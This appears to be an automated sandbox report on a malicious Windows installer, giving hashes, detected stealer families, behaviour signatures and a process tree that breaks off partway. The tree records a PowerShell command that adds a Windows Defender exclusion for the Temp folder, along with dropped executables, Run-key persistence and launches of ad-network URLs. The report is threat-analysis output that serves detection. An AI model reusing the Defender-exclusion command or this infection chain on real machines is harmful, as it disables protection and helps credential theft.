Analysis
-
max time kernel
761s -
max time network
1795s -
platform
windows11_x64 -
resource
win11 -
submitted
12-09-2021 07:11
General
-
Target
setup_x86_x64_install.exe
-
Size
3.5MB
-
MD5
1b5154bc65145adba0a58e964265d5f2
-
SHA1
5a96fd55be61222b3e6438712979dc2a18a50b8c
-
SHA256
c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19
-
SHA512
9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 36 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
rl_trojan 1 IoCs
redline stealer.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 50 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 64 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 16 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 55 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 34 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 7 IoCs
-
Modifies system certificate store 2 TTPs 20 IoCs
-
Runs ping.exe 1 TTPs 4 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 9 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun05ac1b0207d3ff3b8.exeSun05ac1b0207d3ff3b8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 2966⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun052bbd8bebd9.exeSun052bbd8bebd9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05532f7abc.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun05532f7abc.exeSun05532f7abc.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 468 -s 2926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun05d60bc3b96248e5.exeSun05d60bc3b96248e5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun050462125c7d35.exeSun050462125c7d35.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\8399659.exe"C:\ProgramData\8399659.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3308 -s 23487⤵
- Program crash
-
-
-
C:\ProgramData\8186077.exe"C:\ProgramData\8186077.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
-
-
C:\ProgramData\8099308.exe"C:\ProgramData\8099308.exe"6⤵
-
-
C:\ProgramData\7080211.exe"C:\ProgramData\7080211.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 22247⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun05899db881f67fb29.exeSun05899db881f67fb29.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun05fa3b4d2ae56e.exeSun05fa3b4d2ae56e.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 2926⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun054fe19a12cb3.exeSun054fe19a12cb3.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-ML8QA.tmp\Sun054fe19a12cb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-ML8QA.tmp\Sun054fe19a12cb3.tmp" /SL5="$20150,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun054fe19a12cb3.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-GIS95.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-GIS95.tmp\46807GHF____.exe" /S /UID=burnerch23⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Common Files\YEMOADZPAZ\ultramediaburner.exe"C:\Program Files\Common Files\YEMOADZPAZ\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-FA96C.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-FA96C.tmp\ultramediaburner.tmp" /SL5="$50260,281924,62464,C:\Program Files\Common Files\YEMOADZPAZ\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\34-abba8-67d-044ad-4d7d3108e210c\Qigomofikae.exe"C:\Users\Admin\AppData\Local\Temp\34-abba8-67d-044ad-4d7d3108e210c\Qigomofikae.exe"4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff9e78c46f8,0x7ff9e78c4708,0x7ff9e78c47186⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:26⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:36⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1344 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5236 /prefetch:26⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5004 /prefetch:86⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1540 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2228,6065464775245619328,12727893889355601538,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6356 /prefetch:86⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e78c46f8,0x7ff9e78c4708,0x7ff9e78c47186⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514835⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff9e78c46f8,0x7ff9e78c4708,0x7ff9e78c47186⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\26-e53dc-414-82486-8defa78c60702\Daezholypuda.exe"C:\Users\Admin\AppData\Local\Temp\26-e53dc-414-82486-8defa78c60702\Daezholypuda.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ys2dvmht.hn1\LivelyScreenRecorder.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\ys2dvmht.hn1\LivelyScreenRecorder.exeC:\Users\Admin\AppData\Local\Temp\ys2dvmht.hn1\LivelyScreenRecorder.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mp32rtdd.vxt\GcleanerEU.exe /eufive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\mp32rtdd.vxt\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\mp32rtdd.vxt\GcleanerEU.exe /eufive6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5fcdywkx.k4o\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\5fcdywkx.k4o\installer.exeC:\Users\Admin\AppData\Local\Temp\5fcdywkx.k4o\installer.exe /qn CAMPAIGN="654"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5fcdywkx.k4o\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5fcdywkx.k4o\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171494 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\szpyi1px.gsh\SmartPDF.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\szpyi1px.gsh\SmartPDF.exeC:\Users\Admin\AppData\Local\Temp\szpyi1px.gsh\SmartPDF.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-AJK8K.tmp\SmartPDF.tmp"C:\Users\Admin\AppData\Local\Temp\is-AJK8K.tmp\SmartPDF.tmp" /SL5="$40366,138429,56832,C:\Users\Admin\AppData\Local\Temp\szpyi1px.gsh\SmartPDF.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-39P6S.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-39P6S.tmp\Setup.exe" /Verysilent8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"9⤵
- Executes dropped EXE
- Modifies registry class
-
